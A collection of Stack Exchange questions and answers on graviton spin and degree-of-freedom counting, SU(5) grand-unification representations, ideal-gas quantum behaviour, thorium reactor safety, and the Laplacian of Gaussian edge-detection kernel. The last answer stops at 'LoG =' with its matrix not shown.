and the currents corresponding to Lorentz symmetries are given by,
$$(\mathcal{J}^\mu)^{\rho \sigma} = x^\rho T^{\mu \sigma} - x^\sigma T^{\mu \rho}-i\bar{\psi}\gamma^\mu S^{\rho \sigma} \psi$$
where the matrices $S^{\mu \nu}$ form the appropriate representation of the Lorentz algebra. After canonical quantization, the currents $\mathcal{J}$ become operators, and acting on the states will confirm that, in this case, the excitations carry spin $1/2$. In gravity, we proceed similarly. The metric can be expanded as,
$$g_{\mu \nu} = \eta_{\mu \nu} + f_{\mu \nu}$$
and we expand the field $f_{\mu \nu}$ as a plane wave with operator-valued Fourier coefficients, i.e.
$$f_{\mu \nu} \sim \int \frac{\mathrm{d}^3 p}{(2\pi)^3} \frac{1}{\sqrt{\dots}} \left\{ \epsilon_{\mu \nu} a_p e^{ipx} + \dots\right\}$$
We only keep terms of linear order $\mathcal{O}(f_{\mu \nu})$, compute the conserved currents analogously to other quantum field theories, and once promoted to operators as well act on the states to determine the excitations indeed have spin $2$.
Counting physical degrees of freedom
The graviton has spin $2$, and as it is massless only two degrees of freedom. We can verify this in gravitational perturbation theory. We know $h^{ab}$ is a symmetric matrix, and only $d(d+1)/2$ distinct components. In de Donder gauge, $$\nabla^{a}\bar{h}^{ab} = \nabla^a\left(h^{ab}-\frac{1}{2}h g^{ab}\right) = 0$$
which provides us $d$ gauge constraints. There is also a residual gauge freedom, providing that infinitesimally, we shift by a vector field, i.e.
$$X^\mu \to X^\mu + \xi^\mu$$
providing $\square \xi^\mu + R^\mu_\nu \xi^\nu = 0$, which restricts us by $d$ as well. Therefore the total physical degrees of freedom are,
$$\frac{d(d+1)}{2}-2d = \frac{d(d-3)}{2}$$
If $d=4$, the graviton indeed has only two degrees of freedom.
Important Caveat
Although we often find a field with a single vector index has spin one, with two indices spin two, and so forth, it is not always the case, and determining the spin should be done systematically. Consider, for example, the Dirac matrices, which satisfy the Clifford algebra,
$$\{ \Gamma^a, \Gamma^b\} = 2g^{ab}$$
On an $N$-dimensional Kahler manifold $K$, if we work in local coordinates $z^a$, with $a = 1,\dots,N$, and the metric satisfies $g^{ab} = g^{\bar{a} \bar{b}} = 0$, the expression simplifies:
$$\{ \Gamma^a, \Gamma^b\} = \{ \Gamma^{\bar{a}}, \Gamma^{\bar{b}}\} = 0$$
$$\{ \Gamma^a, \Gamma^{\bar{b}}\} = 2g^{ab}$$
Modulo constants, we see that we can think of $\Gamma^a$ as an annihilation operator, and $\Gamma^{\bar{b}}$ as a creation operator for fermions. Given that we define $\lvert \Omega \rangle$ as the Fock vacuum, we can define a general spinor field $\psi$ on the Kahler manifold $K$ as,
$$\psi(z^a,\bar{z}^{\bar{a}}) = \phi(z^a,\bar{z}^{\bar{a}}) \lvert \Omega \rangle + \phi_{\bar{b}}(z^a,\bar{z}^{\bar{a}}) \Gamma^{\bar{b}} \lvert \Omega \rangle + \dots$$
Given that $\phi$ has no indices, we would expect it to be a spinless field, but it can interact with the $U(1)$ part of the spin connection. Interestingly, we can only guarantee that $\phi$ is neutral if the manifold $K$ is Ricci-flat, in which case it is Calabi-Yau manifold. | {
"domain": "physics.stackexchange",
"id": 13145,
"tags": "general-relativity, quantum-spin, gravitational-waves"
} |
Representation of the $\rm SU(5)$ model in GUT | Question: In Srednicki's textbook Quantum Field Theory, section 97 discusses Grand Unification. On page 606, it states:
In terms of $\rm SU(5)$, we have
\begin{equation}
5 \otimes 5 = 15_{S} \oplus 10_{A} \tag{97.5}
\end{equation}
where the subscripts $S$ and $A$ refer to symmetric and antisymmetric respectively.
To my understanding, $15_{S}$ is a $15 \times 15$ matrix, and $10_{A}$ is a $10 \times 10$ matrix. Am I right?
However, in the text, a left-handed Weyl field $\chi_{ij} = - \chi_{ji}$ in the 10 representation is defined. Its components are given by
\begin{equation}
\chi_{ij} = \left( \begin{array}{ccccc} 0 & \overline{u}^{g} & -\overline{u}^{b} & u_{r} & d_{r} \\ -\overline{u}^{g} & 0 & \overline{u}^{r} & u_{b} & d_{b} \\ \overline{u}^{b} & -\overline{u}^{r} & 0 & u_{g} & d_{g} \\ -u_{r} & - u_{b} & -u_{g} & 0 & \overline{e} \\ -d_{r} & -d_{b} & -d_{g} & -\overline{e} & 0
\end{array} \right). \tag{97.12}
\end{equation}
Why is $\chi_{ij}$ not a $10 \times 10$ matrix, but a $5\times 5$ matrix?
Answer: Representations are vector spaces that behave a certain way when the group acts on them. Representations are often labelled by their vector space dimension. The fundamental representation of $SU(5)$ is just the space of 5-dimensional complex vectors, so we call it $5$. The representation $10_A$ is a 10-dimensional vector space, and $15_S$ is a 15-dimensional vector space.
Now, it so happens that one convenient way of representing the vectors of $10_A$ is as anti-symmetric $5\times 5$ matrices. That is, the 10 basis "vectors" of $10_A$ are the matrices $\chi^{12}, \chi^{13}, \dots$. where
$$\chi^{12} = \begin{pmatrix}0 & 1 & 0 & 0 & 0 \\ -1 & 0 & 0 &0&0\\0&0&0&0&0\\0&0&0&0&0\\0&0&0&0&0\end{pmatrix}$$
and so on.
You can work out that there are "5 choose 2" = 10 of these basis vectors. Likewise, you can represent the 15 basis vectors of $15_S$ as the 15 independent symmetric $5\times 5$ matrices.
The key thing to remember is that the vectors in a representation are an abstract thing. You can represent them as lists of numbers, or as particular matrices, or as anything else. | {
"domain": "physics.stackexchange",
"id": 62069,
"tags": "field-theory, group-theory, representation-theory, grand-unification"
} |
Randomness and Thermodynamics | Question: I am currently reading The road to reality by Roger Penrose. In chapter 27 he discusses time symmetry in dynamic evolution.
He defines the Second Law of thermodynamics the following way:
Heat flows from a hotter to a colder body.
He states that this law implies time asymmetry: When you look at a system of two bodies, one colder than the other, the hotter body will become colder and the heat will transfer to the other body until they are in equilibrium. The system evolves perfectly deterministically. But when you look at the system backwards, the two bodies are in equilibrium and after some time suddenly one body will get colder and the other one will get hotter.
Now my question: In a universe where time evolution is reversed would such a process be perceived as a random process with no deterministic cause? In a two body system in equilibrium one body would suddenly get colder and the other one hotter. But in this universe it can not be determined which body will get colder and when - it is essentially a random process. If the theoretical inhabitants of this universe looked at this process backwards, they could not really recover the Second Law of Thermodynamics. From their viewpoint they could only state that the body that ends up hotter after the equilibrium breaks will get hotter.
Is it possible that there are such "hidden laws" that underlie a process, but cannot be determined because their dynamical evolution is hidden similarly to the process described above?
Answer: Probably a more interesting question is: How can these hypothetical inhabitants observe or think?
If thoughts are also time reversed, whatever that means, the mental states of the observers go from (0) seeing that the system reached equilibrium to (1) watching the equilibration process to (2) expecting that heat transfer will take place. So they're not surprised, unless they have a memory of their future.
That's, of course, supposing that mental states are well defined and that the sense of present would be preserved, which is not obviously the case $-$ after all, synapses and electrical impulses are also backwards.
These inhabitants' eyes shoot light rays instead of absorbing them: Nerve impulses come through the optical nerves and a series of inverse chemical reactions culminate with the retinal changing its structure, causing the pigment opsin to emit a light pulse.
Another important question is: how exactly is the time evolution reversed? The nature of the mechanism responsible for this change is likely to strongly influence the answers to these questions. Actually, without this mechanism being specified, I'm not really sure that's a physics question at all.
Now, if the observers are "normal" and the time is reversed only in an experiment of theirs, then, as others pointed out in the comments, the second law is a statistical law: it does't prohibit weird stuff from happening, only posits it's incredibly unlikely it will. From a microscopic point of view, the system has been put in an extremely special state, one that leads to heat being conducted along the heat gradient, instead of against it. | {
"domain": "physics.stackexchange",
"id": 44998,
"tags": "thermodynamics, statistical-mechanics, thought-experiment, randomness"
} |
Differences between perturbation theory in quantum mechanics, quantum field theory and condensed matter physics? | Question:
For perturbation theory method, are there any difference or links in basic quantum mechanics, quantum field theory and in condensed matter physics?
I know the meaning in basic quantum mechanics (focus on single particle problem, especially), for example, considering the following partition for total Hamiltonian $H$
$$H= H_0 + \mu H_1$$
if one knows the solution for $H_0$ and then one can derive the approximate solution (to evaluate the energy correction, wavefunction correction) of total Hamiltonian $H$ based on the solution of $H_0$ when $\mu$ is a very small parameter.I think this must be the original idea developed to attack the real physical problems in quantum mechanics.
But how this method can be applied in quantum field theory (considering relativistic effect) and also survives in condensed matter physics (many-body), both based on Green's function rather than wavefunction? What's the missing history? How to bridge this gap?
Any relevant comments and references are beneficial. Thanks in advance.
Answer: Quantum field theory is a very abstract and complicated theory; one needs in general time to assimilate it, in particular as the degree of abstraction is much higher than that of 1-particle quantum mechanics. What is the bridge between QM and QFT? The basis of QFT is still a Hilbert space (called Fock space), but its states are no longer one-particle wave functions, but multi-particle states. That's a large leap in abstraction; however, even if the mathematical formalism in principle is the same, it does not look the same, though. Operators are defined on the Fock space as well as on the 1-particle Hilbert space. The Hamiltonian operator can be defined (for a non-interacting theory, for an interacting theory it's more complicated in general), as well a momentum operator etc. These operators can be expressed by the (most) basic operators of the Fock space: the creation and annihilation operators. If you don't feel familiar with these operators, study the 1-particle harmonic oscillator. In that context (1-particle Hilbert space) these operators are already defined, certainly with the "nasty" property of being non-diagonal in the usual Fock-space representation. BTW in case of the 1-particle harmonic oscillator, they are also non-diagonal. Once you get used to it, this turns out to be a rather nice property in fact.
Further abstraction provides the Heisenberg-picture in QFT, in contrast, to commonly used Schrodinger picture. But as you certainly know you can also swap from one picture to the other by a unitary transformation, and the physics does not change. This rule is valid in QM as well as in QFT. Probably you can also formulate QFT in the Schrodinger picture, but the formalism will become even more complicated than it is already, so better not to try it.
So time-dependence is transferred to the operators. This is necessary to make the theory explicitly relativistic invariant: time and space should be treated on the same footing.
This is certainly one of the biggest difference between QM and QFT. But time does not lose completely the special role it has in QM. Time also remains a parameter in QFT as well it is in QM. It is more the other way around: Whereas position is an operator in QM, in QFT it is downgraded to a parameter like time, as it should be. This is BTW well described in the QFT book of Srednicki.
Last but not least, the equations to solve are usually non-linear. That means, in general, they cannot be solved. Actually, this is nothing really new:
also in QM, this happens (but less often). And as you already mentioned, in order to progress perturbation theory is used. The Hamiltonian is split into a non-interacting part and an interacting part. This is crucially based on the existence of a small parameter (call it $\mu$ or $\alpha$ or $\lambda$ etc.). The principle is the same in QM as well as in QFT. The perturbation theory is then based on the development of the evolution operator $|\Psi(t)> = U(t,t_0)|\Psi(t_0)>$. The evolution operator can be written in a series called Dyson-series with the solution (see for instance the Wikipedia page on the subject "Dyson-series")
$$U(t,t_0) = T \exp(-i \int_{t_0}^{t} d\tau V(\tau))$$
where $V$ is the small interaction part of the Hamilton operator $H=H_0+V$ and $T$ is the time-ordering operator (for more see Wikipedia or QFT textbooks).
Each term of this series can be represented by a Feynman-diagram. I think the Dyson-series can already be used in non-relativistic QM.
However, the interaction operator $V(\tau)$ is rather different from the one of familiar QM. In QM it describes in most cases an external field or some "wave-function-different" operator; in QFT the mutual interaction between the field in consideration and the interaction, typically another field, is taken into account. In this way you get the Green's functions in, in particular, if self-interaction $V=\frac{\lambda}{4!}\phi^4$ of the field $\phi$ is considered.
I think these are the main characteristics of how QFT is different from QM. Certainly, there is much more to say, but this can be read in QFT-books.
I admit, most books advance in big steps towards Feynman diagrams and renormalization, so the basics are often treated quickly. One last advice:
forget about wave-functions; they no longer exist in QFT. Field operators, often designated by the same symbol have nothing to do with wave-functions. The multi-particle states take over the role of the wave-functions.
Read books or/and ask your professor. Most well-known sources are Peskin-Schroeder, Srednicki, (both are not so easy to read for a beginner), Zee's book QFT in a nutshell, L.H.Ryder QFT etc. | {
"domain": "physics.stackexchange",
"id": 38345,
"tags": "quantum-mechanics, quantum-field-theory, condensed-matter, perturbation-theory, greens-functions"
} |
Unknown program 'spark-itemsimilarity' chosen | Question: I have cloudera CDH5 running inside a virtual box.
when I try to run :
mahout spark-itemsimilarity ....
I get the error:
Unknown program 'spark-itemsimilarity' chosen.
Do i have to install any additional package to run the spark-similarity?
Any help would be appreciated !
Answer: Spark support for Mahout came from Mahout 0.10 release while you are using 0.9 release. So this should explain why you get the unknown program error. I would suggest using a higher version of Mahout. | {
"domain": "datascience.stackexchange",
"id": 845,
"tags": "apache-spark, apache-mahout, recommender-system"
} |
Why we don't talk about unit cells in hcp/fcc structures? | Question: I'm studying basics of Solid State Chemistry from this source.
So there are 14 types of Bravais crystal lattices (Primitive + Centered) in 3D. Every solid in this universe is made by the unit cells of these lattices. OK so far so good.
Later on there was the topic of Close packing and Structure of Metallic Crystals and we are told about hcp /fcc types of structures.
Problems:
Why do we remain silent about the unit cells and crystal system in this context? It seems like a huge disconnect.
Is there any relation between the Hexagonal Unit cell and hexagonal close packing?
Answer: We do not remain silent about the unit cells in this context. The hexagonal close packed structure is called so because it has hexagonal unit cell, and the other one is called fcc precisely because its unit cell is face-centered cubic.
(source) | {
"domain": "chemistry.stackexchange",
"id": 8920,
"tags": "physical-chemistry, crystal-structure, solid-state-chemistry"
} |
Simple .cfg parser | Question: I'm currently working to implement a simple configuration file parser. I intend to add more functional down the road.
ConfigReader.hpp
#include <string>
#include <vector>
class ConfigReader
{
public:
struct record
{
std::string section;
std::string name;
std::string value;
};
ConfigReader();
explicit ConfigReader (const std::string & file);
bool readfile (const std::string & file);
std::string get_string (const std::string & tsection,
const std::string & tname, std::string tdefault = std::string());
private:
std::vector<record> records;
};
ConfigReader.cpp
#include <fstream>
#include "ConfigReader.hpp"
namespace
{
/* Erases leading tabs, leading spaces; trailing tabs, trailing spaces. */
std::string & trim (std::string & str)
{
// leading tabs / spaces
int i = 0;
while (i < (int) str.length() && (str[i] == ' ' || str[i] == '\t'))
++i;
// erase leading tabs / spaces
if (i > 0)
str.erase (0, i);
int j = i = str.length();
while (i > 0 && (str[i - 1] == ' ' || str[i - 1] == '\t'))
--i;
// erase trailing tabs / spaces
if (i < j)
str.erase (i, j);
return str;
}
/* Erases tabs and spaces between the variable's name and its value. */
std::string & normalize (std::string & str)
{
// Erases leading tabs, leading spaces; trailing tabs, trailing spaces.
trim (str);
// i is the start of the section of tabs and spaces.
// j is the end of said section.
std::size_t i, j;
i = j = 0;
while (i < str.length())
{
if (str[i] == ' ' || str[i] == '\t')
{
j = i + 1;
// find the end of section of tabs and spaces.
while (j < str.length() && (str[j] == ' ' || str[j] == '\t'))
++j;
// if the section consists of just one character,
// then erase just one character.
// otherwise, remove j - i characters.
if (j == i)
str.erase (i, 1);
else
str.erase (i, j - i);
}
else
{
str[i] = std::tolower (str[i]);
++i;
}
}
return str;
}
/* Check if a line consists only of spaces and tabs */
bool spaceonly (const std::string & line)
{
for (int i = 0, j = line.length(); i < j; ++i)
{
if (line[i] != ' ' && line[i] != '\t')
return false;
}
return true;
}
/* Check if a line is valid */
bool isvalid (std::string & line)
{
normalize (line);
std::size_t i = 0;
// if the line is a section
if (line[i] == '[')
{
// find where the section's name ends
std::size_t j = line.find_last_of (']');
// if the ']' character wasn't found, then the line is invalid.
if (j == std::string::npos)
return false;
// if the distance between '[' and ']' is equal to one,
// then there are no characters between section brackets -> invalid line.
if (j - i == 1)
return false;
}
/* Check if a line is a comment */
else if (line[i] == ';' || line[i] == '#' || (line[i] == '/' && line[i + 1] == '/'))
return false;
/* Check if a line is ill-formed */
else if (line[i] == '=' || line[i] == ']')
return false;
else
{
std::size_t j = line.find_last_of ('=');
if (j == std::string::npos)
return false;
if (j + 1 >= line.length())
return false;
}
return true;
}
// parse the line and write the content to our vector
void parse (std::vector<ConfigReader::record> & records, std::string & section, std::string & line)
{
std::size_t i = 0;
// if the line is a section
if (line[i] == '[')
{
++i;
std::size_t j = line.find_last_of (']') - 1;
section = line.substr (i, j);
}
// if the line is a variable + value
else
{
ConfigReader::record temp;
temp.section = section;
// construct the name of the variable
std::size_t j = line.find ('=');
std::string name = line.substr (i, j);
temp.name = name;
// construct the variable's value
std::size_t k = line.find ('=') + 1;
std::size_t z = line.find (';');
z = (z == std::string::npos) ? line.length() : z;
std::string value = line.substr (k, z); // bug ? if the line is width = 32; then the semicolon is not erased.
temp.value = value;
records.push_back (temp);
}
}
}
bool ConfigReader::readfile (const std::string & file)
{
records.clear();
std::ifstream config (file);
if (!config.is_open())
return false;
std::string section;
std::string buffer;
std::size_t i = 0;
while (std::getline (config, buffer, '\n'))
{
if (!spaceonly (buffer))
{
if (isvalid (buffer))
parse (records, section, buffer);
else{}
// std::cout << "Failed at line " << i;
}
++i;
}
return true;
}
std::string ConfigReader::get_string (const std::string & tsection,
const std::string & tname, std::string tdefault)
{
for (std::size_t i = 0; i < records.size(); ++i)
{
if (records[i].section == tsection && records[i].name == tname)
{
return records[i].value;
}
}
record temp;
temp.section = tsection;
temp.name = tname;
temp.value = tdefault;
records.push_back (temp);
return tdefault;
}
ConfigReader::ConfigReader (const std::string & file) : records()
{
readfile (file);
}
ConfigReader::ConfigReader() : records()
{
}
The syntax of the config file is simple:
[video]
width = 1920;
etc;
What should I change? Improve? Are there any errors? (Well, there is one in parse.)
Answer: Use standard algorithms where applicable. For instance, trim could be rewritten:
std::string& trim(std::string& s) {
auto is_whitespace = [] (char c) -> bool { return c == ' ' || c == '\t'; };
auto first_non_whitespace = std::find_if_not(begin(s), end(s), is_whitespace);
s.erase(begin(s), first_non_whitespace);
auto last_non_whitespace = std::find_if_not(s.rbegin(), s.rend(), is_whitespace)
.base();
s.erase(std::next(last_non_whitespace), end(s));
return s;
}
Likewise, normalize could be written like this:
std::string& normalize(std::string& s) {
s.erase(std::remove_if(begin(s), end(s),
[] (char c) { return c == ' ' || c == '\t'; }),
end(s));
std::transform(begin(s), end(s), begin(s),
[] (char c) { return std::tolower(c); });
return s;
}
Note that the intent of this code is quite clear -- I didn't need to add comments to let you know what each section of the code was meant to be doing (although it is necessary to know standard C++ algorithms and idioms like erase-remove). It took me a few minutes of careful reading to realize that you were removing all whitespace in your normalize function; my version makes this very clear. Are you sure you want to remove all whitespace? Couldn't some future configuration use string types?
PS I chose to use C++11 features like auto and lambda, but this code can be written in C++03 with not very much more boilerplate code.
In isvalid, you declare std::size_t i = 0. This is confusing for a couple of reasons. When I see a variable declared non-const, I expect that it will change. Even if it were const, i is not meaningful here. Use 0 instead of i throughout that function to make it more readable. Likewise, your use of j is not self-documenting. I expect i and j to be loop variables. For j it's a bit more forgivable because it has such a narrow scope, but last_bracket is a name that tells me what the variable is actually for.
Also, throughout isvalid, you dereference line[0] and line[1], but line might be empty after normalization. Even if you think that's not the case because of spaceonly guarding it, you should add an assertion that documents the precondition. As it stands, your code will access out-of-bounds memory when the line contains only whitespace and a single '/'.
get_string has funny semantics. For one thing, if my config file is
[Video]
Foo = Bar
I will get an empty string when calling getline("Video", "Foo") because you normalize the configuration file but not the queries.
Why do you store a default value if the query fails to find a record? This is not behavior I would expect; in fact, I'd expect get_string to be declared const. If you insist on storing a temp value, you should add a constructor for record and rewrite the storage as records.push_back(record(tsection, tname, tdefault));; in modern compilers, this will result in no copy being made while your version requires a copy.
You should also consider a different data structure. There are a few reasonable options.
Keep using a vector, but sort it and use lower_bound to do lookups.
Use a map keyed on section or section and name.
Use an unordered_map.
It depends on future class features, the expected size of config files, and the frequency of insertions, but the vector approach is almost certainly best -- see this blog entry for example.
This list is not exhaustive, but it should get you started. | {
"domain": "codereview.stackexchange",
"id": 4099,
"tags": "c++, parsing"
} |
Check if IP address list has subnet or is supernet | Question: I need to iterate over a list of IP addresses, to check if the elements inside are subnets/supernets between them, for this I use the IP-address library.
Currently I have the following problem: my second iterator (which I use to iterate over the rest of the list) always starts at 0 and therefore compares each element of the list twice (which I think can be avoided).
Here is part of the txt file from which I create the list:
Name
10.104.181.0/23
10.104.180.0/24
10.132.83.112/32
10.104.183.0/24
10.104.185.0/24
10.104.185.32/24
174.28.164.30/24
178.38.233.0/24
10.104.186.0/24
10.132.208.0/24
10.104.185.42/24
10.130.217.88/32
10.104.24.108/24
10.134.213.84/32
10.134.205.18/32
10.104.182.145/32
10.123.232.95/32
10.130.236.0/24
10.105.26.245/32
10.134.65.250/32
10.134.222.120/32
10.104.184.62/32
10.104.184.61/32
10.105.121.0/24
And here is my python code:
import ipaddress
import sys
fileobj=open("test.txt")
for line in fileobj:
lines.append(line.strip())#create the list from the txt file
lines.pop(0)#remove line "name"
for line in lines:
for j in range(1,len(lines)):
if(line==lines[j]):#problem here: j start always at 1
print('comparing same line.... skipping')
pass
elif(ipaddress.ip_network(line,False).subnet_of(ipaddress.ip_network(lines[j],False))):#check if subnet
print(line+' is subnet of network'+lines[j])
elif(ipaddress.ip_network(line,False).supernet_of(ipaddress.ip_network(lines[j],False))):#check if supernet
print(line+' is super of network'+lines[j])
What I'm looking for:
How to solve the problem of my second iterator.
Any other improvement (whatever it is, formatting, algorithm,...) is appreciated.
Answer: This section:
fileobj=open("test.txt")
for line in fileobj:
lines.append(line.strip())#create the list from the txt file
lines.pop(0)#remove line "name"
has an alternate representation as an iterator-adjustment to skip one line:
with open('test.txt') as fileobj:
next(fileobj)
lines = [line.strip() for line in fileobj]
Also note use of a list comprehension and a context manager.
Your separate supernet/subnet checks are redundant. If A is a subnet of B, B is a supernet of A; so it's not even worth doing the second.
Algorithmically: if your list is very, very long you may want to consider moving away from your current nested loop. Your current loop is O(n^2) in time and I don't immediately see a way to avoid this . Consider doing something like - roughly -
Populate a list of tuples of start and end IP address integers and IP objects; the packed integer representation can be obtained by casting an ipaddress object to int
Sort this list; a naive .sort() should work
On your outer loop, iterate over all entries for subnet selection
Prune away any potential supernets whose end is so low that they will never match again
On your inner loop, iterate from the beginning of the list up to the current entry and then quit.
This sortation and early-bail should improve your performance a little.
Example
Edit: "a little" seems to be a (vast) understatement; comparing the two:
from collections import OrderedDict
from functools import partial
from ipaddress import IPv4Network
from random import randrange, randbytes, seed
from timeit import timeit
from typing import Iterable, Tuple, Sequence
NetRow = Tuple[int, int, str]
IndexRow = Tuple[int, int]
def parse_addresses(filename: str) -> Iterable[NetRow]:
with open(filename) as f:
next(f)
for line in f:
net_str = line.strip()
net = IPv4Network(net_str, strict=False)
yield int(net.network_address), int(net.broadcast_address), net_str
def end_indices(nets: Sequence[NetRow]) -> Iterable[IndexRow]:
for i, (start, end, net) in enumerate(nets):
yield end, i
def new(filename: str):
# Start and end integers and network objects ordered by start
subnets = sorted(parse_addresses(filename))
# Supernet dictionary by index from subnets; in same order as subnets
supernets = OrderedDict(enumerate(subnets))
# List of tuples of subnet end to subnet index, used for pruning
ends = sorted(end_indices(subnets))
for sub_start, sub_end, subnet in subnets:
# If there are any supernets whose end occurs before the current start,
# they need to be pruned because they will never match
for n_to_drop, (end, index) in enumerate(ends):
if end >= sub_start:
break
supernets.pop(index)
del ends[:n_to_drop]
for super_start, super_end, supernet in supernets.values():
# Skip comparison to self
if subnet is supernet:
continue
# If the current supernet start is after the current subnet start,
# there will not be any more supernets that encompass this subnet
if super_start > sub_start:
break
# The supernet start occurs at or before the current subnet start.
# If the supernet end occurs at or after the current subnet end,
# then the supernet encompasses the subnet.
if super_end >= sub_end:
# assert subnet.subnet_of(supernet)
print(f'{subnet} is subnet of {supernet}')
def old(filename: str):
lines = []
fileobj = open(filename)
for line in fileobj:
lines.append(line.strip()) # create the list from the txt file
lines.pop(0) # remove line "name"
for line in lines:
for j in range(1, len(lines)):
if (line == lines[j]): # problem here: j start always at 1
# print('comparing same line.... skipping')
pass
elif (IPv4Network(line, False).subnet_of(
IPv4Network(lines[j], False))): # check if subnet
print(line
+ ' is subnet of network ' + lines[j])
#elif (IPv4Network(line, False).supernet_of(
# IPv4Network(lines[j], False))): # check if supernet
# print(line
# + ' is super of network ' + lines[j])
def generate_test(filename: str, min_mask: int, rows: int):
seed(0) # for repeatability
with open(filename, 'w') as f:
f.write('Name\n')
for _ in range(rows):
addr = '.'.join(str(b) for b in randbytes(4))
mask = randrange(min_mask, 31)
f.write(f'{addr}/{mask}\n')
if __name__ == '__main__':
generate_test('bigtest.txt', min_mask=14, rows=1_000)
for method, title in (
(new, 'New'),
(old, 'Old'),
):
print(f'{title} method:')
t = timeit(partial(method, 'bigtest.txt'), number=1)
print(f'{t:.3f}s\n')
Output
New method:
50.100.190.198/30 is subnet of 50.100.216.175/16
68.143.197.241/26 is subnet of 68.142.21.93/15
87.88.133.166/17 is subnet of 87.88.222.120/17
87.88.222.120/17 is subnet of 87.88.133.166/17
101.186.112.235/19 is subnet of 101.186.155.104/14
106.183.253.213/22 is subnet of 106.180.121.90/14
110.142.177.23/29 is subnet of 110.140.246.97/14
110.206.109.247/20 is subnet of 110.205.222.149/14
125.43.157.205/28 is subnet of 125.42.59.132/15
138.157.204.243/29 is subnet of 138.157.172.230/14
158.221.173.230/30 is subnet of 158.221.69.71/14
239.186.245.174/18 is subnet of 239.185.216.72/14
243.3.157.156/28 is subnet of 243.3.56.96/16
0.029s
Old method:
87.88.222.120/17 is subnet of network 87.88.133.166/17
125.43.157.205/28 is subnet of network 125.42.59.132/15
106.183.253.213/22 is subnet of network 106.180.121.90/14
101.186.112.235/19 is subnet of network 101.186.155.104/14
158.221.173.230/30 is subnet of network 158.221.69.71/14
243.3.157.156/28 is subnet of network 243.3.56.96/16
87.88.133.166/17 is subnet of network 87.88.222.120/17
50.100.190.198/30 is subnet of network 50.100.216.175/16
110.206.109.247/20 is subnet of network 110.205.222.149/14
138.157.204.243/29 is subnet of network 138.157.172.230/14
110.142.177.23/29 is subnet of network 110.140.246.97/14
68.143.197.241/26 is subnet of network 68.142.21.93/15
239.186.245.174/18 is subnet of network 239.185.216.72/14
33.487s
A more "fair" comparison uses your own algorithm but with a pre-parse step:
def old(filename: str):
lines = []
with open(filename) as fileobj:
next(fileobj)
for line in fileobj:
net_str = line.strip()
lines.append((net_str, IPv4Network(net_str, False)))
for subnet_str, subnet in lines:
for supernet_str, supernet in lines:
if subnet_str is supernet_str:
continue
if subnet.subnet_of(supernet):
print(f'{subnet_str} is subnet of {supernet_str}')
This still took 1.87s on my machine, which is ~58x the time of the 32ms of the new method.
Comparing the new and fair-old methods for min_mask=20, rows=10_000 is more dramatic: 0.362s vs. 249.763s, ~690x faster. | {
"domain": "codereview.stackexchange",
"id": 41334,
"tags": "python-3.x, ip-address"
} |
Finding Interatomic Spacing | Question: Here is the problem I am working on
For what temperatures are the atoms in an ideal gas at pressure P quantum mechanical ? Hint: use the ideal gas law P V = N kT to deduce the interatomic spacing (the answer is $T < (1/k)(h^2/3m)^{3/5} P^{2/5})$. Obviously we want m to be as small as possible and P as large as possible for the gas to show quantum behavior. Put in numbers for helium at atmospheric pressure. Is hydrogen in outer space (interatomic distance ≈ 1 cm and temperature ≈ 3K) quantum mechanical?
According to the answer key, to find the interatomic spacing, we need to find the size of a single gas particle. One gas particle corresponds to N=1, and the volume is V = d^3. This leads to
$d = \left( \frac{kT}{P} \right)^{1/3}$
I have two objections to this, for which I hope you provide correction. Firstly, assigning the volume V=d3 implies that we are assuming that the atoms are square? Secondly, how does finding the size of a single gas particle provide us with the interatomic spacing. It would seem that the most we could deduce from such information is, that closest two gas particles could get. Are we to assume that the gas particles are this closely packed? Wouldn't the gas solidify at this point?
Answer: The idea of the question is to find the temperature at which the average interparticle spacing is equal to the average de Broglie wavelength. Both of these are averages because the atoms of the ideal gas are not evenly spaced and the velocity (and therefore de Broglie wavelength) of the ideal gas atoms follows the Maxwell-Boltzmann distribution. So this is going to be a very rough calculation.
Given how rough the calculation is, the approximation that the gas atoms are on average equally spaced seems a reasonable one. In that case our $N$ atoms are distributed in a volume $V$, so the average spacing $d$ is:
$$\begin{align}
d &= \left( \frac{V}{N} \right)^{1/3} \\
&= \left( \frac{\frac{NkT}{P}}{N} \right)^{1/3} \\
&= \left( \frac{kT}{P} \right)^{1/3}
\end{align}$$ | {
"domain": "physics.stackexchange",
"id": 15240,
"tags": "quantum-mechanics, homework-and-exercises, ideal-gas"
} |
Is a Rubbia thorium reactor safer than other modern reactor types? | Question: I keep wondering how a Rubbia thorium reactor would handle a natural disaster of Fukushima level intensity. As I understand it the nuclear chain reaction would stop instantly if the power is cut, but nasty waste products such as Uranium-233 would still require substantial cooling and hence it would seem that this reactor is just as unsafe as any other type of reactor with definite risk of meltdown, radiation and other problems?
Answer:
As I understand it the nuclear chain reaction would stop instantly if the power is cut, but nasty waste products such as Uranium-233 would still require substantial cooling
You are focusing on entirely the wrong thing.
A reactor burning Thorium produces fission products (like all reactors), including the majority of the heat source as well as radioactive Iodine and Cesium isotopes. The problem with Fukushima was mostly the release of such isotopes into the atmosphere (ultimately, isn't all of nuclear safety concerned with this?). However much heat U-233 produces is completely beside the point when you ask to compare it to Fukushima, it matters, just not for this question.
I keep wondering how a Rubbia thorium reactor would handle a natural disaster of Fukushima level intensity.
The key design feature of the Rubbia proposed reactor is that it is a subcritical accelerator driven reactor. To the extent that it uses a solid fuel form that does not have active fission product removal it is subject to the aforementioned problems.
The problems of sustained removal of decay heat in even the most dire of circumstances, however, have been addressed very well just with the next generation of reactors we are building today (although the concern can never be completely eliminated). The "passive" designs share the same fuel type with Fukushima (and almost all other reactors in the world), and just use natural forces to cool the reactor for weeks to months after an accident so loss of power isn't a concern. These same passive design principles could (and would) be applied to the Rubbia reactor design, because the Rubbia idea addresses concerns very different from the problems at Fukushima, which include sustainability and criticality safety.
The reduced radioactivity of accelerator driven subcritical reactors and Thorium reactors is not the short-lived stuff that creates problems during accidents. Mostly they reduce the long term waste and the unused fuel. | {
"domain": "physics.stackexchange",
"id": 10165,
"tags": "nuclear-engineering"
} |
Introduction to IP : Laplacian of Gaussian? | Question: I am very new to the concept of computer vision (and image processing), and trying to understand the algorithm used for edge detection.
One thing I'm currently struggling to figure out is the Laplacian of Gaussian
In this case, how to you determine the value of x and y? I thought the centre of the kernel was the origin $((x,y) = (0,0))$, but it doesn't seems like the right number.
Also, if there are any resources that you would recommend to go through, I would really appreciate them.
Answer: You are right about the $x$ and $y$ values. The center of the matrix is $(0,0)$ and the corner points are $(\pm 4,\pm 4)$. But they obviously wanted integer values in the matrix, so they simply scaled the LoG function by a factor of $482.75$ (just to get a decent range). Evaluating the function with this scale factor gives you (for the lower right quarter of the total matrix):
LoG =
